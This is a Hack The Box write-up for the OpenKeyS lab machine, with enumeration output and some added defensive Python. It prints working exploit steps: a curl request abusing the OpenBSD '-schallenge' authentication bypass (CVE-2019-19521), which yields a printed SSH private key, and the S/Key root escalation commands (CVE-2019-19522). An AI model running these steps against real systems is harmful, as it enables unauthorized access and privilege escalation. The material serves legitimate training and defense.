# OpenKeyS


## Overview

OpenKeyS was, at the time, one of the few boxes I had done that revolved around exploiting published vulnerabilities. It was very fun and interesting, to say the least. Even though it was rated Medium, it was fairly easy to tackle if the enumeration was done right.

### References

* [OpenBSD Authentication Bypass and Local Privilege Escalation Vulnerabilities](https://www.secpod.com/blog/openbsd-authentication-bypass-and-local-privilege-escalation-vulnerabilities/)
* [Qualys Security Advisory - OpenBSD Authentication Bypass / Privilege Escalation](https://packetstormsecurity.com/files/155572/Qualys-Security-Advisory-OpenBSD-Authentication-Bypass-Privilege-Escalation.html)

## Enumeration

### Masscan: Finding Open Ports

Here, we will be looking for any open ports, both TCP and UDP, so that we can find our attack path once further port scanning has been completed.

```bash
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.199 --rate=1000 | tee OpenKeys_OpenPorts.log

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-09-13 15:13:54 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.199                                    
Discovered open port 22/tcp on 10.10.10.199
```

### Nmap: Port Scanning

Using the log file created by the *masscan* run, we will filter out the port numbers to simplify our lives. In this case, as we only have two ports to enumerate, we could have skipped that step.

At this point in my process, I was relying on *aggressive* scanning, which is technically not necessary and should not be done if we do not want to be detected.

```bash
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ PORTS=$(cat OpenKeys_OpenPorts.log | grep open | cut -d" " -f4 | cut -d"/" -f1 | xargs | tr " " ",")
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -A -sV -p $PORTS openkeys.htb -oN OpenKeys_PortScan.log -oX OpenKeys_PortScan.xml
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:18 EDT
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
|   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open  http    OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -sV -p 22 openkeys.htb --script vulners
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:31 EDT
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|_    	CVE-2014-9278	4.0	https://vulners.com/cve/CVE-2014-9278

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.43 seconds
```
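The cut/xargs/tr one-liner above turns the masscan log into an nmap port list, but it silently assumes a single host and TCP only. The following is an added example of mine, not part of the original write-up, that generalizes that step: it parses masscan's `Discovered open port` lines for any number of hosts, keeps TCP and UDP apart, and emits nmap's `T:…,U:…` port syntax so UDP hits are not quietly fed to a TCP-only scan. The embedded log text is constructed from the run above; the `161/udp` line is invented to exercise the UDP path.

```python
"""Convert masscan output into per-host nmap port specifications.

Added example, not from the original write-up: a generalisation of the
cut/xargs/tr one-liner that handles several hosts and keeps TCP and UDP
ports apart. SAMPLE_LOG is constructed; the 161/udp line is invented to
exercise the UDP path.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

# masscan reports each hit as: "Discovered open port 80/tcp on 10.10.10.199"
DISCOVERED = re.compile(r"^Discovered open port (\d{1,5})/(tcp|udp) on (\S+)")

# Constructed log text modelled on the masscan run in the write-up.
SAMPLE_LOG = """\
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-09-13 15:13:54 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.199
Discovered open port 22/tcp on 10.10.10.199
Discovered open port 161/udp on 10.10.10.199
Discovered open port 80/tcp on 10.10.10.199
"""


def parse_masscan(log_text: str) -> Dict[str, Dict[str, Set[int]]]:
    """Map each host to its open TCP and UDP port sets (duplicate lines collapse)."""
    hosts: Dict[str, Dict[str, Set[int]]] = defaultdict(lambda: {"tcp": set(), "udp": set()})
    for line in log_text.splitlines():
        match = DISCOVERED.match(line)
        if match is None:
            continue  # banner and progress lines carry no port data
        port, proto, host = int(match.group(1)), match.group(2), match.group(3)
        if 0 < port < 65536:
            hosts[host][proto].add(port)
    return dict(hosts)


def nmap_port_spec(ports: Dict[str, Set[int]]) -> str:
    """Render an nmap -p argument such as 'T:22,80,U:161'; '' when nothing is open."""
    parts = []
    if ports["tcp"]:
        parts.append("T:" + ",".join(map(str, sorted(ports["tcp"]))))
    if ports["udp"]:
        parts.append("U:" + ",".join(map(str, sorted(ports["udp"]))))
    return ",".join(parts)


def build_nmap_argv(host: str, ports: Dict[str, Set[int]]) -> List[str]:
    """Build an argv list for a version scan of exactly the discovered ports.

    A scan type is added per protocol: without -sU, nmap ignores the U: ports
    (with a warning) and the UDP findings from masscan would be lost.
    """
    argv = ["nmap", "-sV"]
    if ports["tcp"]:
        argv.append("-sT")
    if ports["udp"]:
        argv.append("-sU")  # UDP scanning needs root privileges
    argv += ["-p", nmap_port_spec(ports), host]
    return argv


if __name__ == "__main__":
    for host, ports in parse_masscan(SAMPLE_LOG).items():
        print(" ".join(build_nmap_argv(host, ports)))
```

Feed it the real log with `parse_masscan(open("OpenKeys_OpenPorts.log").read())` and it yields one nmap command per host; hosts with no hits never appear.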

### Gobuster: Directory Enumeration

Given the exposed web service, directory enumeration is the next step. At the same time, we must keep every option open: the OpenBSD SSH service must also be researched.

```bash
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ gobuster dir -k -u http://openkeys.htb/ -w /usr/share/wordlists/dirb/common.txt -r -l -b 403,404 -t 50 --timeout 20s --wildcard 2> /dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:                     http://openkeys.htb/
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.0.1
[+] Show length:             true
[+] Follow Redir:            true
[+] Timeout:                 20s
===============================================================
2020/09/13 12:22:28 Starting gobuster
===============================================================
/css (Status: 200) [Size: 697]
/fonts (Status: 200) [Size: 1066]
/index.html (Status: 200) [Size: 96]
/index.php (Status: 200) [Size: 4837]
/images (Status: 200) [Size: 589]
/includes (Status: 200) [Size: 711]
/js (Status: 200) [Size: 582]
/vendor (Status: 200) [Size: 1522]
===============================================================
2020/09/13 12:22:57 Finished
===============================================================
```

## Exploitation and Gaining Access

Inspecting /includes gave us access to a swap file. We need to retrieve it in order to inspect it offline.

```bash
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ wget http://openkeys.htb/includes/auth.php.swp
--2020-09-13 12:40:05--  http://openkeys.htb/includes/auth.php.swp
Resolving openkeys.htb (openkeys.htb)... 10.10.10.199
Connecting to openkeys.htb (openkeys.htb)|10.10.10.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’

auth.php.swp             [   <=>                ]  12.00K  29.4KB/s    in 0.4s    

2020-09-13 12:40:05 (29.4 KB/s) - ‘auth.php.swp’ saved [12288]

jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ strings auth.php.swp 
b0VIM 8.1
jennifer
openkeys.htb
/var/www/htdocs/includes/auth.php
3210
#"! 
    session_start();
    session_destroy();
    session_unset();
function close_session()
    $_SESSION["username"] = $_REQUEST['username'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["logged_in"] = True;
function init_session()
    }
        return False;
    {
    else
    }
        }
            return True;
            $_SESSION['last_activity'] = $time;
            // Session is active, update last activity time and return True
        {
        else
        }
            return False;
            close_session();
        {
            ($time - $_SESSION['last_activity']) > $session_timeout)
        if (isset($_SESSION['last_activity']) && 
        $time = $_SERVER['REQUEST_TIME'];
        // Has the session expired?
    {
    if(isset($_SESSION["logged_in"]))
    // Is the user logged in? 
    session_start();
    // Start the session
    $session_timeout = 300;
    // Session timeout in seconds
function is_active_session()
    return $retcode;
    system($cmd, $retcode);
    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
function authenticate($username, $password)
<?php
```

As you can see on line 15, we found jennifer as the potential user.
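Why does `strings` on a Vim swap file give up a username, a hostname and a path? Because Vim's first block (block0) stores them in fixed-width fields right after the `b0VIM` signature, which is why `jennifer`, `openkeys.htb` and `/var/www/htdocs/includes/auth.php` come out one after another; the `3210` and `#"! ` lines are the block's magic markers. The parser below is an added example of mine, not something from the write-up, that reads those fields out of a swap header. It builds a constructed sample header with the user, host and path values from the output above; the timestamp, inode and PID in the sample are invented.

```python
"""Parse the block0 header of a Vim swap file (.swp).

Added example (not from the original write-up): shows why `strings auth.php.swp`
leaks the editing user's login name, the hostname and the edited file's path.
Field layout follows struct block0 in Vim's memline.c; the sample header built
below is constructed, with user/host/path taken from the write-up and the
timestamp, inode and PID invented.
"""
import struct
from datetime import datetime, timezone

B0_UNAME_SIZE = 40        # b0_uname: login name of the editing user
B0_HNAME_SIZE = 40        # b0_hname: hostname
B0_FNAME_SIZE_ORG = 900   # b0_fname: full path of the edited file

# "b0" + version[10] + page_size, mtime, ino, pid (4 x uint32 LE) + uname + hname + fname
BLOCK0 = struct.Struct(f"<2s10sIIII{B0_UNAME_SIZE}s{B0_HNAME_SIZE}s{B0_FNAME_SIZE_ORG}s")
MAGIC_OFFSET = BLOCK0.size     # 1008: b0_magic_long follows the fname field
MAGIC_LONG_BYTES = b"3210"     # 0x30313233 little-endian: the "3210" line in the strings output


def _cstr(raw: bytes) -> str:
    """Decode a NUL-padded fixed-width C string field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", errors="replace")


def parse_swap_header(data: bytes) -> dict:
    """Extract the metadata Vim stores in block0; ValueError if not a swap file."""
    if len(data) < MAGIC_OFFSET + len(MAGIC_LONG_BYTES):
        raise ValueError("too short to be a Vim swap file")
    b0_id, version, page_size, mtime, ino, pid, uname, hname, fname = BLOCK0.unpack_from(data, 0)
    if b0_id != b"b0" or not version.startswith(b"VIM"):
        raise ValueError("missing b0VIM signature")
    if data[MAGIC_OFFSET:MAGIC_OFFSET + 4] != MAGIC_LONG_BYTES:
        raise ValueError("b0_magic_long mismatch; not a little-endian Vim swap file")
    return {
        "version": _cstr(version),        # e.g. "VIM 8.1"
        "page_size": page_size,           # block size; file length is a multiple of it
        "mtime": mtime,                   # mtime of the edited file when the swap was made
        "mtime_utc": datetime.fromtimestamp(mtime, tz=timezone.utc).isoformat(),
        "inode": ino,
        "pid": pid,                       # PID of the Vim process that owned the swap file
        "user": _cstr(uname),
        "host": _cstr(hname),
        "path": _cstr(fname),
    }


def build_sample_swap(page_size: int = 4096) -> bytes:
    """Construct a minimal block0 (64-bit little-endian layout) for demonstration."""
    header = BLOCK0.pack(
        b"b0", b"VIM 8.1",
        page_size,
        1592991076,          # constructed mtime (2020-06-24T09:31:16Z)
        123456,              # constructed inode
        31337,               # constructed pid
        b"jennifer", b"openkeys.htb",
        b"/var/www/htdocs/includes/auth.php",
    )
    # b0_magic_long (8-byte long), b0_magic_int, b0_magic_short, b0_magic_char
    magic = struct.pack("<QIHB", 0x30313233, 0x20212223, 0x1011, 0x55)
    return (header + magic).ljust(page_size, b"\0")  # pad to a full page like Vim does


if __name__ == "__main__":
    for key, value in parse_swap_header(build_sample_swap()).items():
        print(f"{key:>10}: {value}")
```

Run against the real file with `parse_swap_header(open("auth.php.swp", "rb").read())`; the remaining pages hold the buffer text, which is what the reversed PHP in the `strings` output came from. Any editor artifact left in a document root leaks this much before a single line of source is read, which is the argument for keeping `.swp`, `~` and `.bak` files out of web-served paths.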

After researching the SSH banner information, it seems there are some vulnerabilities that we can attempt.

The OpenBSD Authentication Bypass Vulnerability [CVE-2019-19521](https://www.secpod.com/blog/openbsd-authentication-bypass-and-local-privilege-escalation-vulnerabilities/) is one that can be used against multiple services hosted on OpenBSD.

In this case, we can try `-schallenge` as the username in the HTTP request, but we also need to name the potential user, jennifer, in the request header, which we will provide along with the session cookie.
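From the defender's side, the recovered `authenticate()` in auth.php is where this should have been stopped: it hands the submitted username straight to `check_auth`, so a value beginning with `-` reaches OpenBSD's authentication code looking like an option. The following is an added example of mine, not code from the box or the write-up, showing the validation layer that was missing. It keeps the helper path and argument order from the recovered source; the `runner` parameter exists only so the function can be exercised without the real helper.

```python
"""Input validation for a wrapper around OpenBSD's check_auth helper.

Added example (not from the box or the write-up). The recovered auth.php
passes the submitted username into a shell command unvalidated, so a name
starting with '-' is interpreted downstream as an authentication option
(CVE-2019-19521). The fix at this layer is an allowlist for login names,
applied before anything is executed, plus argv construction without a shell.
"""
import re
import subprocess
from typing import Callable

# Portable login name: leading letter or underscore, then letters, digits,
# underscore or hyphen, 32 characters at most. A leading '-' cannot match.
LOGIN_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_-]{0,31}")


def validate_username(name: str) -> bool:
    """True only for a plain login name; rejects option-like, empty or odd input."""
    return isinstance(name, str) and LOGIN_NAME.fullmatch(name) is not None


def authenticate(username: str, password: str,
                 helper: str = "../auth_helpers/check_auth",
                 runner: Callable = subprocess.run) -> bool:
    """Hardened counterpart of auth.php's authenticate().

    Differences from the recovered code: the username is validated before the
    helper is started, and the helper is invoked with an argv list instead of
    a shell command string, so escapeshellcmd-style quoting is not needed.
    The password is still passed as an argument because that is the helper's
    interface as recovered; it is visible in the process list, which is a
    separate issue from the one fixed here.
    """
    if not validate_username(username):
        return False
    if not password or "\0" in password:
        return False  # empty or NUL-bearing strings cannot be valid argv entries
    result = runner([helper, username, password], check=False)
    return result.returncode == 0
```

The key property is that the helper is never started for a rejected name, so the `-s` option parsing downstream is never reached, whatever the authentication program does with it.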

```bash
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ curl -X POST -L http://openkeys.htb/index.php -d "username=-schallenge&password=admin" -H "Cookie: PHPSESSID=t3h374336g59i28aeiomgf6i9t; username=jennifer"
<!DOCTYPE html>


<html><head><title>OpenKeyS - Retrieve your OpenSSH Keys</title></head><body><div><h3>OpenSSH key for user jennifer</h3><p style='font-family: monospace, monospace;'>-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn<br />
NhAAAAAwEAAQAAAYEAo4LwXsnKH6jzcmIKSlePCo/2YWklHnGn50YeINLm7LqVMDJJnbNx<br />
OI6lTsb9qpn0zhehBS2RCx/i6YNWpmBBPCy6s2CxsYSiRd3S7NftPNKanTTQFKfOpEn7rG<br />
nag+n7Ke+iZ1U/FEw4yNwHrrEI2pklGagQjnZgZUADzxVArjN5RsAPYE50mpVB7JO8E7DR<br />
PWCfMNZYd7uIFBVRrQKgM/n087fUyEyFZGibq8BRLNNwUYidkJOmgKSFoSOa9+6B0ou5oU<br />
qjP7fp0kpsJ/XM1gsDR/75lxegO22PPfz15ZC04APKFlLJo1ZEtozcmBDxdODJ3iTXj8Js<br />
kLV+lnJAMInjK3TOoj9F4cZ5WTk29v/c7aExv9zQYZ+sHdoZtLy27JobZJli/9veIp8hBG<br />
717QzQxMmKpvnlc76HLigzqmNoq4UxSZlhYRclBUs3l5CU9pdsCb3U1tVSFZPNvQgNO2JD<br />
S7O6sUJFu6mXiolTmt9eF+8SvEdZDHXvAqqvXqBRAAAFmKm8m76pvJu+AAAAB3NzaC1yc2<br />
EAAAGBAKOC8F7Jyh+o83JiCkpXjwqP9mFpJR5xp+dGHiDS5uy6lTAySZ2zcTiOpU7G/aqZ<br />
9M4XoQUtkQsf4umDVqZgQTwsurNgsbGEokXd0uzX7TzSmp000BSnzqRJ+6xp2oPp+ynvom<br />
dVPxRMOMjcB66xCNqZJRmoEI52YGVAA88VQK4zeUbAD2BOdJqVQeyTvBOw0T1gnzDWWHe7<br />
iBQVUa0CoDP59PO31MhMhWRom6vAUSzTcFGInZCTpoCkhaEjmvfugdKLuaFKoz+36dJKbC<br />
f1zNYLA0f++ZcXoDttjz389eWQtOADyhZSyaNWRLaM3JgQ8XTgyd4k14/CbJC1fpZyQDCJ<br />
4yt0zqI/ReHGeVk5Nvb/3O2hMb/c0GGfrB3aGbS8tuyaG2SZYv/b3iKfIQRu9e0M0MTJiq<br />
b55XO+hy4oM6pjaKuFMUmZYWEXJQVLN5eQlPaXbAm91NbVUhWTzb0IDTtiQ0uzurFCRbup<br />
l4qJU5rfXhfvErxHWQx17wKqr16gUQAAAAMBAAEAAAGBAJjT/uUpyIDVAk5L8oBP3IOr0U<br />
Z051vQMXZKJEjbtzlWn7C/n+0FVnLdaQb7mQcHBThH/5l+YI48THOj7a5uUyryR8L3Qr7A<br />
UIfq8IWswLHTyu3a+g4EVnFaMSCSg8o+PSKSN4JLvDy1jXG3rnqKP9NJxtJ3MpplbG3Wan<br />
j4zU7FD7qgMv759aSykz6TSvxAjSHIGKKmBWRL5MGYt5F03dYW7+uITBq24wrZd38NrxGt<br />
wtKCVXtXdg3ROJFHXUYVJsX09Yv5tH5dxs93Re0HoDSLZuQyIc5iDHnR4CT+0QEX14u3EL<br />
TxaoqT6GBtynwP7Z79s9G5VAF46deQW6jEtc6akIbcyEzU9T3YjrZ2rAaECkJo4+ppjiJp<br />
NmDe8LSyaXKDIvC8lb3b5oixFZAvkGIvnIHhgRGv/+pHTqo9dDDd+utlIzGPBXsTRYG2Vz<br />
j7Zl0cYleUzPXdsf5deSpoXY7axwlyEkAXvavFVjU1UgZ8uIqu8W1BiODbcOK8jMgDkQAA<br />
AMB0rxI03D/q8PzTgKml88XoxhqokLqIgevkfL/IK4z8728r+3jLqfbR9mE3Vr4tPjfgOq<br />
eaCUkHTiEo6Z3TnkpbTVmhQbCExRdOvxPfPYyvI7r5wxkTEgVXJTuaoUJtJYJJH2n6bgB3<br />
WIQfNilqAesxeiM4MOmKEQcHiGNHbbVW+ehuSdfDmZZb0qQkPZK3KH2ioOaXCNA0h+FC+g<br />
dhqTJhv2vl1X/Jy/assyr80KFC9Eo1DTah2TLnJZJpuJjENS4AAADBAM0xIVEJZWEdWGOg<br />
G1vwKHWBI9iNSdxn1c+SHIuGNm6RTrrxuDljYWaV0VBn4cmpswBcJ2O+AOLKZvnMJlmWKy<br />
Dlq6MFiEIyVKqjv0pDM3C2EaAA38szMKGC+Q0Mky6xvyMqDn6hqI2Y7UNFtCj1b/aLI8cB<br />
rfBeN4sCM8c/gk+QWYIMAsSWjOyNIBjy+wPHjd1lDEpo2DqYfmE8MjpGOtMeJjP2pcyWF6<br />
CxcVbm6skasewcJa4Bhj/MrJJ+KjpIjQAAAMEAy/+8Z+EM0lHgraAXbmmyUYDV3uaCT6ku<br />
Alz0bhIR2/CSkWLHF46Y1FkYCxlJWgnn6Vw43M0yqn2qIxuZZ32dw1kCwW4UNphyAQT1t5<br />
eXBJSsuum8VUW5oOVVaZb1clU/0y5nrjbbqlPfo5EVWu/oE3gBmSPfbMKuh9nwsKJ2fi0P<br />
bp1ZxZvcghw2DwmKpxc+wWvIUQp8NEe6H334hC0EAXalOgmJwLXNPZ+nV6pri4qLEM6mcT<br />
qtQ5OEFcmVIA/VAAAAG2plbm5pZmVyQG9wZW5rZXlzLmh0Yi5sb2NhbAECAwQFBgc=<br />
-----END OPENSSH PRIVATE KEY-----</p><a href='index.php'>Back to login page</a></div></body></html>
```

BINGO!! What we just retrieved is the SSH private key from 'jennifer'. Let's use it to access the system as this user.

```bash
jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ ssh -i jennifer.key jennifer@openkeys.htb
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
 
Welcome to OpenBSD: The proactively secure Unix-like operating system.
 
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
 
openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ ls
user.txt
openkeys$ cat user.txt
36ab21********************1d2b10
```

And we have found the user flag! Let's follow on and attempt to escalate privileges by using a vulnerability related to the one we used against httpd.

## Privilege Escalation

The vulnerability used to bypass authentication against httpd is related to CVE-2019-19522, which allows local privilege escalation via S/Key and YubiKey. In this case, we will leverage S/Key.

```bash
openkeys$ cd /tmp
openkeys$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
openkeys$ chmod 0600 /etc/skey/root
openkeys$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password:
S/Key Password [echo on]: 
Sorry
openkeys$ env -i TERM=vt220 su -l -a skey 
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
openkeys# id                                                                    
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
```
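The escalation works because a record for `root` could be dropped into `/etc/skey` by an ordinary user. As an added example of mine (not from the write-up), here is a small audit that reads only file metadata and reports what an administrator would want to know about that directory: records for users who never enrolled in S/Key, records owned by someone other than root or the named user, loose permissions, and non-regular entries. `demo()` builds a constructed directory under a temp path mirroring the end state above (an enrolled `jennifer` record plus the out-of-band `root` one); the `root_uid` parameter is overridable only so that the demo can run unprivileged.

```python
"""Audit an S/Key database directory for the conditions behind CVE-2019-19522.

Added example, not from the write-up. Metadata only: nothing here reads or
modifies a record's contents. demo() builds a constructed directory under a
temp path with a placeholder 'jennifer' record and an out-of-band 'root'
record, the situation the escalation above leaves behind.
"""
import os
import pwd
import stat
import tempfile
from typing import Callable, Iterable, List, Optional


def system_uid(name: str) -> Optional[int]:
    """Look up a login name in the local password database; None if unknown."""
    try:
        return pwd.getpwnam(name).pw_uid
    except KeyError:
        return None


def audit_skey_dir(skey_dir: str,
                   expected_users: Iterable[str] = (),
                   uid_of: Callable[[str], Optional[int]] = system_uid,
                   root_uid: int = 0) -> List[str]:
    """Return human-readable findings; an empty list means nothing stood out.

    expected_users: users known to have enrolled with skeyinit. Any other record,
    a root record included, is reported. A record may be owned by root or by the
    user it is named after; any other owner is reported.
    """
    findings: List[str] = []
    try:
        dst = os.lstat(skey_dir)
    except FileNotFoundError:
        return findings  # S/Key database absent: nothing to audit
    if not stat.S_ISDIR(dst.st_mode):
        return [f"{skey_dir}: not a directory"]
    if dst.st_uid != root_uid:
        findings.append(f"{skey_dir}: owned by uid {dst.st_uid}, expected root")
    if dst.st_mode & stat.S_IWOTH:
        findings.append(f"{skey_dir}: world-writable")
    if dst.st_mode & stat.S_IWGRP and not dst.st_mode & stat.S_ISVTX:
        # OpenBSD ships /etc/skey as mode 01730; group write without the sticky
        # bit would let group members remove or replace each other's records.
        findings.append(f"{skey_dir}: group-writable without the sticky bit")
    enrolled = set(expected_users)
    for name in sorted(os.listdir(skey_dir)):
        path = os.path.join(skey_dir, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            findings.append(f"{path}: not a regular file")
            continue
        if name not in enrolled:
            findings.append(f"{path}: record for '{name}' not in the enrolled-user list")
        owners = {root_uid}
        uid = uid_of(name)
        if uid is not None:
            owners.add(uid)
        if st.st_uid not in owners:
            findings.append(f"{path}: owned by uid {st.st_uid}, neither root nor '{name}'")
        if stat.S_IMODE(st.st_mode) & 0o077:
            findings.append(f"{path}: mode {stat.S_IMODE(st.st_mode):04o} grants group/other access")
    return findings


def _write_record(path: str, text: bytes) -> None:
    """Create a record with mode 0600 regardless of umask."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    try:
        os.write(fd, text)
    finally:
        os.close(fd)
    os.chmod(path, 0o600)


def demo() -> List[str]:
    """Constructed S/Key directory: one enrolled user plus an unexplained root record."""
    skey = os.path.join(tempfile.mkdtemp(), "skey")
    os.mkdir(skey)
    os.chmod(skey, 0o1730)  # OpenBSD's default mode: sticky bit plus group write
    # Placeholder record contents; only their metadata matters to the audit.
    _write_record(os.path.join(skey, "jennifer"), b"jennifer md5 0099 exampleseed 0000000000000000\n")
    _write_record(os.path.join(skey, "root"), b"root md5 0100 exampleseed 0000000000000000\n")
    me = os.getuid()  # unprivileged run: treat ourselves as root for the ownership checks
    return audit_skey_dir(skey, expected_users=["jennifer"],
                          uid_of={"jennifer": me}.get, root_uid=me)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host the call is simply `audit_skey_dir("/etc/skey", expected_users=<enrolled logins>)`; the ownership check is what catches the case above, since a `root` record written by jennifer is owned by uid 1001, and the enrolled-user check catches it even on a box where the file had been chowned. Pairing this with a file-integrity monitor on `/etc/skey` turns the artifact of the technique into an alert rather than a post-mortem finding.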

As shown above, by following the associated vulnerability specifications, we were able to escalate privileges. Now, let's grab the root flag:

```bash
openkeys# pwd
/root
openkeys# ls
.Xdefaults  .cshrc      .forward    .profile    .viminfo    root.txt
.composer   .cvsrc      .login      .ssh        dead.letter
openkeys# cat dead.letter                                                         
Date: Sun, 13 Sep 2020 15:40:02 +0000 (UTC)
From: root (Cron Daemon)
To: root
Subject: Cron <root@openkeys> /usr/bin/find /tmp -name "sess*" -amin +5 -exec rm {} \;
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <PATH=/bin:/sbin:/usr/bin:/usr/sbin>
X-Cron-Env: <HOME=/var/log>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
 
rm: /tmp/sess_gvhju8kvqk0m4dup24fhsm3c15: No such file or directory
rm: /tmp/sess_euod42diulnrrbir7cp2ehdioa: No such file or directory
rm: /tmp/sess_j094qg8rs6kpk76k7ukb5tlt0c: No such file or directory
rm: /tmp/sess_m447es74eb7k33ro5c66bs2hiq: No such file or directory
rm: /tmp/sess_hg0vdh8grjilq15r26da6b2um8: No such file or directory
 
openkeys# cat root.txt                                                            
f3a553********************fc6efa
```

